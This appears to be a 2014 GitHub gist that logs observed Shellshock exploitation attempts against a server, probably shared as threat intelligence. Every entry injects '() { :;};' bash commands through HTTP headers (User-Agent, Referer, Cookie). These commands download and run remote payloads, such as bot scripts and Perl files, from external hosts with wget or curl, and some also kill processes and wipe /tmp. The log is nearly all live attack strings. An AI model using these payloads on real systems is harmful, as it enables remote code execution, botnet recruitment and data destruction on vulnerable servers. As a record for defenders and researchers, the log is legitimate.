Skip to content

Instantly share code, notes, and snippets.

@jatrost

jatrost/exploitation-attempts.log

Created September 29, 2014 15:49
Show Gist options
  • Save jatrost/30ee4a0db160478c0392 to your computer and use it in GitHub Desktop.
Save jatrost/30ee4a0db160478c0392 to your computer and use it in GitHub Desktop.
Download ZIP
True Exploitation attempts
Raw
exploitation-attempts.log
source_ip: 63.131.141.125
url: http://XXX.XXX.XXX.XXX/
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"
Content-Type: text/plain
source_ip: 63.131.141.125
url: http://XXX.XXX.XXX.XXX/cgi-bin/test.sh
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"
Content-Type: text/plain
source_ip: 63.131.141.125
url: http://XXX.XXX.XXX.XXX/test
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"
Content-Type: text/plain
source_ip: 82.97.19.69
url: http://XXX.XXX.XXX.XXX/
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"
Content-Type: text/plain
source_ip: 121.9.244.212
url: http://XXX.XXX.XXX.XXX/cgi-bin/test-cgi
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"
Content-Type: text/plain
source_ip: 94.32.106.53
url: http://XXX.XXX.XXX.XXX/
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"
Content-Type: text/plain
source_ip: 103.10.87.220
url: http://XXX.XXX.XXX.XXX/
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"
Content-Type: text/plain
source_ip: 217.72.242.16
url: http://XXX.XXX.XXX.XXX/cgi-bin/test.sh
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"
Content-Type: text/plain
source_ip: 217.72.242.16
url: http://XXX.XXX.XXX.XXX/test
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"
Content-Type: text/plain
source_ip: 202.122.21.106
url: http://XXX.XXX.XXX.XXX/
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"
Content-Type: text/plain
source_ip: 46.246.34.82
url: http://XXX.XXX.XXX.XXX/
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
Referer: () { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl
Content-Type: text/plain
Cookie: () { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl
source_ip: 217.72.242.16
url: http://XXX.XXX.XXX.XXX/
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"
Content-Type: text/plain
source_ip: 70.42.149.71
url: http://XXX.XXX.XXX.XXX/
HTTP Headers:
Host: XXX.XXX.XXX.XXX
Content-Length:
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"
Content-Type: text/plain
source_ip: 70.42.149.71
url: http://XXX.XXX.XXX.XXX/cgi-bin/test.sh
HTTP Headers:
Host: XXX.XXX.XXX.XXX
Content-Length:
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"
Content-Type: text/plain
source_ip: 70.42.149.71
url: http://XXX.XXX.XXX.XXX/cgi-bin/test.sh
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"
Content-Type: text/plain
source_ip: 70.42.149.71
url: http://XXX.XXX.XXX.XXX/test
HTTP Headers:
Host: XXX.XXX.XXX.XXX
Content-Length:
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"
Content-Type: text/plain
source_ip: 70.42.149.71
url: http://XXX.XXX.XXX.XXX/test
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"
Content-Type: text/plain
source_ip: 70.42.149.71
url: http://XXX.XXX.XXX.XXX/
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"
Content-Type: text/plain
source_ip: 67.227.0.73
url: http://XXX.XXX.XXX.XXX/
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "wget -P /var/tmp 174.143.240.43/.../x ; perl /var/tmp/x"
Content-Type: text/plain
source_ip: 75.148.216.82
url: http://XXX.XXX.XXX.XXX/cgi-sys/defaultwebpage.cgi
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "killall -9 php perl;rm -rf /tmp/*;rm -rf /tmp/.*;rm -rf /var/tmp/*;rm -rf /var/tmp/.*;wget -P /var/tmp http://70.246.162.102/h.gif ; perl /var/tmp/h.gif 82.196.7.24"
Content-Type: text/plain
source_ip: 75.148.216.82
url: http://XXX.XXX.XXX.XXX/cgi-bin/test.cgi
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "killall -9 php perl;rm -rf /tmp/*;rm -rf /tmp/.*;rm -rf /var/tmp/*;rm -rf /var/tmp/.*;wget -P /var/tmp http://70.246.162.102/h.gif ; perl /var/tmp/h.gif 82.196.7.24"
Content-Type: text/plain
source_ip: 75.148.216.82
url: http://XXX.XXX.XXX.XXX/cgi-sys/entropysearch.cgi
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "killall -9 php perl;rm -rf /tmp/*;rm -rf /tmp/.*;rm -rf /var/tmp/*;rm -rf /var/tmp/.*;wget -P /var/tmp http://70.246.162.102/h.gif ; perl /var/tmp/h.gif 82.196.7.24"
Content-Type: text/plain
source_ip: 75.148.216.82
url: http://XXX.XXX.XXX.XXX/cgi-bin/env.cgi
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "killall -9 php perl;rm -rf /tmp/*;rm -rf /tmp/.*;rm -rf /var/tmp/*;rm -rf /var/tmp/.*;wget -P /var/tmp http://70.246.162.102/h.gif ; perl /var/tmp/h.gif 82.196.7.24"
Content-Type: text/plain
source_ip: 75.148.216.82
url: http://XXX.XXX.XXX.XXX/cgi-mod/index.cgi
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "killall -9 php perl;rm -rf /tmp/*;rm -rf /tmp/.*;rm -rf /var/tmp/*;rm -rf /var/tmp/.*;wget -P /var/tmp http://70.246.162.102/h.gif ; perl /var/tmp/h.gif 82.196.7.24"
Content-Type: text/plain
source_ip: 75.148.216.82
url: http://XXX.XXX.XXX.XXX/cgi-bin-sdb/printenv
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "killall -9 php perl;rm -rf /tmp/*;rm -rf /tmp/.*;rm -rf /var/tmp/*;rm -rf /var/tmp/.*;wget -P /var/tmp http://70.246.162.102/h.gif ; perl /var/tmp/h.gif 82.196.7.24"
Content-Type: text/plain
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment